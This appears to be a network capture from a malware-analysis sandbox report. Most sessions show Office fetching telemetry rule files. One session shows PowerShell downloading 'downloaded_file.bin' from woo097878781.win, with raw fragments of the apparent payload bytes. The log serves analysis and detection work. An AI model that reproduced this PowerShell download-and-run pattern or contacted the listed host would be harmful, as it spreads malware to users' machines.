2024-12-08 18:53:35 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:35 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:35 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: ecdd694a-c01e-008d-1098-492eec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185335Z-r1cf579d778pftsbhC1EWRa0gn00000000tg000000000a70 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-08 18:53:35 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	49837	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:35 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:35 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:35 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 8332a10a-c01e-0079-4304-48e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185335Z-r1cf579d778qlpkrhC1EWRpfc800000006u0000000005acc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:35 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49840	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:36 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:37 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: e8b3d2c0-701e-0050-0b05-486767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185337Z-r1cf579d778d5zkmhC1EWRk6h800000006h0000000008e6z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:37 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49841	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:36 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:37 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: fdf3550d-a01e-0070-7703-48573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185337Z-r1cf579d778d5zkmhC1EWRk6h800000006fg00000000aaav x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:37 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49844	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:37 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:37 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:37 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 87360b10-801e-00a0-3802-492196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185337Z-r1cf579d7789jf56hC1EWRu58800000001ag000000003702 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-08 18:53:37 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49843	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:37 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:37 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 1dbd65e4-a01e-0002-7203-485074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185337Z-r1cf579d778qgtz2hC1EWRmgks00000005x00000000084t3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:37 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49845	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:37 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:37 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: c1ecbf33-b01e-0002-2142-491b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185337Z-r1cf579d7789jf56hC1EWRu588000000017000000000828f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:37 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49846	154.216.20.243	443	3284	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:38 UTC	180	OUT	GET /downloaded_file.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: woo097878781.win Connection: Keep-Alive
2024-12-08 18:53:38 UTC	270	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:38 GMT Content-Type: application/octet-stream Content-Length: 515600 Last-Modified: Tue, 03 Dec 2024 18:46:46 GMT Connection: close ETag: "674f5216-7de10" X-Powered-By: PleskLin Accept-Ranges: bytes
2024-12-08 18:53:38 UTC	16114	IN	Data Raw: 2e 0c eb e5 fe 51 53 1e 6f 1d b2 28 87 2a e1 8c f3 2c 26 02 f3 81 9b 35 82 5b 91 fb dc cd 0e fa ad 82 31 59 82 ff b6 b7 81 c5 e9 eb 21 76 36 67 6b aa 7f 50 fc fa 16 fc 10 fa 5f 9e 0a b2 fc db 15 50 63 7e fa d9 56 9b 5f 51 a5 28 4e 0e 99 6a 0a a8 f8 bb 0e 69 a0 d8 72 1c 78 8b 7b 10 66 58 dd 68 79 2e 5c 71 32 83 aa fb bd 26 ee 69 f0 86 3a 29 d5 65 fa 90 2b 96 da 7b c1 67 3b b2 fd 14 3f 8f 4b 92 e9 7c 36 83 dd 20 f8 35 15 1a c0 00 f5 e3 d1 d8 93 f5 49 c8 52 47 c8 9f 5b b7 9f 36 c7 de 76 82 00 9e 3a d9 45 db 98 eb 29 3f af ae 91 fd 98 0c 4d 89 b9 60 f0 a0 a0 77 ff a8 fc b4 7a e1 9a 5b 66 88 43 e1 20 01 12 3f d5 d5 ac 6f 1f 2c 95 0a 1b fb 78 96 cf 6b b4 18 4f dd 31 b8 ac 36 cd ca 89 ea 8b 41 b6 a7 b1 de 12 dd 67 6d 84 c5 40 e2 fa d3 49 09 89 26 16 e1 06 27 ca Data Ascii: .QSo(*,&5[1Y!v6gkP_Pc~V_Q(Njirx{fXhy.\q2&i:)e+{g;?K\|6 5IRG[6v:E)?M`wz[fC ?o,xkO16Agm@I&'
2024-12-08 18:53:38 UTC	16384	IN	Data Raw: 8c 15 2f 34 a5 d7 35 3e bf 3c d8 89 78 cb 90 b2 e5 c4 92 d7 2d 5f f3 8a 36 64 02 ad 9e 1c a5 1a 80 94 05 5b 1a ee 74 67 74 40 3b 0a 1f 87 3c 3f f2 2a 83 c9 41 0a 9d 10 ab 5a a2 5d 87 10 49 1a e9 34 75 12 7a 2e dd 8b 1a 68 d3 71 ec 36 41 a5 0a 23 c9 41 83 fb 6e 40 e6 f9 a1 d1 30 51 8a 9c 75 5c d4 26 ed 71 ec 62 0c 70 55 35 0b 2d 99 be cc 8a 2a ea 32 99 3c 32 36 9a f8 a8 58 96 8e 39 d1 90 61 58 22 4e 35 2a 9d 47 cf 1c a1 fe 1e fb b4 7f a7 ad 2f 73 dc 4f 4c 7a 42 14 34 97 ea 6c 50 d8 1c ad 91 8e 8b 49 e4 70 13 1d c6 67 d0 cd d7 a9 98 d6 46 6f f0 da db 18 45 36 cf d3 2f 08 de d5 23 e2 4b 14 fb f4 85 aa e2 bc ef 67 76 47 c7 6f 8e 0b dd 73 5d f1 f6 79 cf e0 cd e4 76 d8 40 4e a0 41 f9 0d b9 2b a8 6c ea 6e 38 d7 6f 85 1c e7 7f bf 9f 35 66 a3 79 ac b4 1b 51 2a 11 Data Ascii: /45><x-_6d[tgt@;<?AZ]I4uz.hq6A#An@0Qu\&qbpU5-2<26X9aX"N5G/sOLzB4lPIpgFoE6/#KgvGos]yv@NA+ln8o5fyQ
2024-12-08 18:53:38 UTC	16384	IN	Data Raw: 77 44 cc 55 d1 3d 87 bf 1a cd a3 dc 09 1e 03 48 d2 63 e4 fd 16 02 8b 35 46 16 d1 71 0a fb 48 45 d7 65 0c e4 3f 16 71 5a a7 8f 4a 34 9d db ac 23 24 b4 f1 f4 fe ce ff f4 8d bf bd 13 73 d7 6f e0 aa d8 49 af ed 20 5b f0 7a 6f 13 72 90 03 52 f8 fb a8 87 6d 01 ab b0 af 0a 29 ca a2 72 8e 8a c4 5a 08 80 6a 72 81 6d 24 35 60 5b 2f 63 42 ba f7 a1 d9 c4 f6 31 be 08 13 c0 3c 47 05 ca 1f 7c 28 38 0d c9 57 4e 4e 73 cb d0 d3 e4 94 9d 70 08 e1 6d 44 20 4b bf 81 f2 95 b8 c4 83 f1 ad c6 0b 96 0b 32 2e ce 8c 47 a2 ff 64 57 7c 24 3a ad a4 ca 7e 82 cb 2c 70 2e ad 80 09 24 2d 34 bd 7e 6a 88 2b fa d3 c4 bc ca 90 e7 87 5e 97 94 d9 1f c2 20 b8 35 b5 91 03 3c cf 86 35 3e b4 f2 b1 c9 10 c8 9c f6 f8 14 bb 71 48 a5 36 00 5c db 5e 9c 24 80 c7 33 0d 82 34 d2 b1 fb b0 14 84 3f 7d a4 9b Data Ascii: wDU=Hc5FqHEe?qZJ4#$soI [zorRm)rZjrm$5`[/cB1<G\|(8WNNspmD K2.GdW\|$:~,p.$-4~j+^ 5<5>qH6\^$34?}
2024-12-08 18:53:38 UTC	16384	IN	Data Raw: fb a5 8f 4e 3d 74 95 bc e4 1b 3d b0 55 a6 7f 3b 9a 97 80 1e be 13 2d d4 2c ac 4e 8b 21 c0 bc 74 5d 2a b9 00 b8 f7 8d 58 5d 7c b4 2c 5e 44 ec 39 7c 75 60 38 8a b0 d2 91 de f2 43 c7 bf 94 49 14 31 d3 2e cc 2c 16 86 ab c0 56 f1 21 ec 31 9a 2e 73 ba af 17 24 f7 cc 8d 68 14 78 49 d8 0a df 8e 5d 56 bf 86 10 78 66 fb a9 74 72 62 ff fb f2 cc dc 43 c0 66 d9 d2 69 9d 33 8d 18 23 00 b6 7e d2 0a 16 82 72 2a 3a 9b 9e 49 d4 70 7e 7f 2a 73 a5 09 0b 72 89 bc b5 c1 70 e2 71 ca 9c a0 6a 8b ea be 6b 16 83 c7 34 e5 39 3c 05 c3 44 93 39 fd b7 8f 20 dc 20 75 d7 f3 04 e3 39 64 ae ea 46 f7 86 ee 26 26 d4 cb 65 67 8d eb 55 30 0d a9 f5 b2 82 35 05 d4 18 13 94 d2 9a 15 fb 3f 4c 97 96 a8 ba 24 6a 28 c9 5b ed e3 33 9e c7 67 d0 7a a8 36 c2 37 29 68 4d 39 b3 a2 02 71 62 11 74 26 37 fa Data Ascii: N=t=U;-,N!t]X]\|,^D9\|u`8CI1.,V!1.s$hxI]VxftrbCfi3#~r:Ip~*srpqjk49<D9 u9dF&&egU05?L$j([3gz67)hM9qbt&7
2024-12-08 18:53:38 UTC	16384	IN	Data Raw: 9f e1 12 13 7a 42 b8 4c 70 71 f8 28 76 2f 9b ce e2 b0 71 ea c6 c4 0f 88 2d 12 1f a4 c9 6f 11 fa 35 f2 b5 ab 01 2e 70 2a eb b6 d0 94 3d 11 fb ca 58 3f e5 bf b6 8d ab 75 0e 5a 41 29 9a 63 5d 9e 20 64 0b 3b 3a ea eb 56 ef 21 eb ab a2 11 ba a6 ad e1 9e a3 2a c4 cd 15 d0 29 c1 1a db b7 1e 17 ef 4d ea e3 d1 9b e7 00 19 2a e8 77 6b 85 0d 16 e8 f7 d6 a8 e6 e7 bc c3 49 b9 b1 e0 80 5b 82 c5 7c ed 65 cb 19 82 52 b8 ee 21 ed 20 c2 3a 14 88 84 6a ef 9c 8d a0 c3 8f a8 dd 08 f3 2a 58 19 fe 0b a2 f3 a9 89 d2 a0 ba 20 b4 5f 0c 86 a4 44 f2 17 2c ba 36 e0 8f ff 49 35 99 d0 a1 49 3e 55 0e 25 80 23 af 61 4c 29 6a ae 72 d2 c6 ca 18 85 4c b6 b5 0c 56 e5 82 e4 06 b8 be 42 8b ff 68 62 1e b2 b0 81 fe c9 e7 b3 25 17 6d 86 2e c8 8a fb 10 26 e6 d6 77 7f 5e 2c fe f4 99 a8 e3 f1 c9 aa Data Ascii: zBLpq(v/q-o5.p=X?uZA)c] d;:V!)MwkI[\|eR! :jX _D,6I5I>U%#aL)jrLVBhb%m.&w^,
2024-12-08 18:53:38 UTC	16384	IN	Data Raw: 86 90 1d 44 42 9e 9e b7 df c0 fc 4b 24 3b 49 c6 df f6 f3 3f de 4f f1 ad 49 e5 94 78 10 b5 28 78 f7 31 1f 26 42 f9 d6 49 0f 1f 08 d7 88 01 f8 4f 9d 88 f1 6e 41 c4 fe d2 40 9a 78 c3 21 3f e6 54 93 4f a0 10 cd a7 14 c4 58 22 7e 82 ef 66 2e d0 a9 62 62 45 aa 8a 7c c3 10 95 9f 4d ff 39 9d 09 ba 78 f4 76 64 e1 f7 82 c2 94 15 57 a9 87 a6 9a b2 6a 63 c9 33 e5 2e a2 98 e8 96 69 ee 0d 8a 69 0c cb 59 f3 10 69 af 9d 69 27 1a 8b 0d 9e b0 e9 3b c9 96 38 12 34 fc 59 59 bb 29 90 b4 6c a8 8d ac 42 57 d8 c7 b2 d3 e5 bc 7a c9 e8 a6 38 9e 3f de ab e6 6a a2 2e 8d 53 f4 b7 52 e1 7b 5d 8c b0 a6 c0 fd 0a 22 c9 4a 23 77 15 8f ee ce e2 bc 86 25 5c 60 3e 35 3a f0 7e 57 0f ef d7 04 df 32 8c 86 2b 15 a3 58 7e e1 88 b9 ea fb 41 9c 7b 4c 25 6a 7e 7b e0 49 0a 37 c3 87 f0 f6 39 2d a5 14 Data Ascii: DBK$;I?OIx(x1&BIOnA@x!?TOX"~f.bbE\|M9xvdWjc3.iiYii';84YY)lBWz8?j.SR{]"J#w%\`>5:~W2+X~A{L%j~{I79-
2024-12-08 18:53:38 UTC	16384	IN	Data Raw: 1b 71 e4 65 12 a3 0e 09 a9 9e ce 01 8d 50 66 7b b8 49 00 44 81 6b 18 ac 44 ac fb 81 a6 1e d2 90 95 f6 2b f1 f1 aa b8 dd d5 34 76 3a 16 7e 70 d4 f1 79 be 22 50 b5 3a f3 5f 48 e9 af 0d 4f 5f 78 71 00 a3 5f 42 f8 67 24 85 1d b3 fa ed 45 49 75 1a cf ec 38 3f 14 28 21 20 eb 36 3d 7a dc f7 92 30 73 f3 02 4c 91 75 8b 29 d1 a7 9c 5a 46 15 3d e1 35 1b e6 ee 5b 91 c0 c0 06 a0 24 58 a2 7b df 0d a7 2c 1c 4e 5a f0 49 b2 44 24 25 76 3b 9b 19 5d d2 ec 9c 9d 39 56 75 55 78 0f ee fa 2a 36 57 af a1 57 d9 72 61 a6 96 1c 71 84 fb 7f ca d1 37 6e f6 13 91 cd 2c 21 be 56 d9 38 6e 31 c6 29 c4 cc f2 69 0e 7d 20 df 37 5b 7d ae ac 23 3c 23 96 58 77 5c 97 11 b3 2d c3 dc c4 a4 21 7e a9 be 92 44 3a eb 6c fe 77 9f 82 8e f3 0c b5 81 65 4e df 4e e8 32 a1 5a e8 b6 7c da ac fb 0c ce a8 10 Data Ascii: qePf{IDkD+4v:~py"P:_HO_xq_Bg$EIu8?(! 6=z0sLu)ZF=5[$X{,NZID$%v;]9VuUx*6WWraq7n,!V8n1)i} 7[}#<#Xw\-!~D:lweNN2Z\|
2024-12-08 18:53:39 UTC	16384	IN	Data Raw: 63 56 1d ab 8d 68 f7 05 e7 4b 47 30 4c 8d 81 e5 3f 2c 84 53 f8 ea 71 36 b9 d8 1e 42 14 cb 56 5f f8 52 0c 5c 6b 27 7e 12 ba 8b ec 8c 50 d6 2b dc 8f 5d 10 b4 cb af 7d 0f bf 7b 0d 7d c9 58 db f4 06 fc 09 f6 d9 c4 e1 9a db 62 42 ce 27 14 05 4c 70 93 e2 d1 27 b4 0f 3c 6b 96 c7 bb 4a 7d 40 bf 18 95 46 87 c4 f6 7b da af dc 7d 39 e8 48 5a 4d 3a c2 df 55 66 04 cd 00 82 8a 2f fc d5 e2 e5 08 85 90 3f b6 7b 74 97 e8 94 85 dd 90 c4 3e 9d 1a 4f 11 13 06 21 56 ea 31 7c 4c cf 01 da 47 00 ff a1 2e 78 41 3d 9f b6 69 32 75 50 42 9f 2a 76 3c 71 dd 55 0c fc c2 46 ab bc 34 3b c9 c9 40 0e 15 c1 60 f0 66 44 2e ef 6e 75 99 b8 0a e3 74 b5 09 1b 5b 26 cb 37 b5 f1 63 bb 47 3f cb 80 46 95 be ac 8a 54 7d 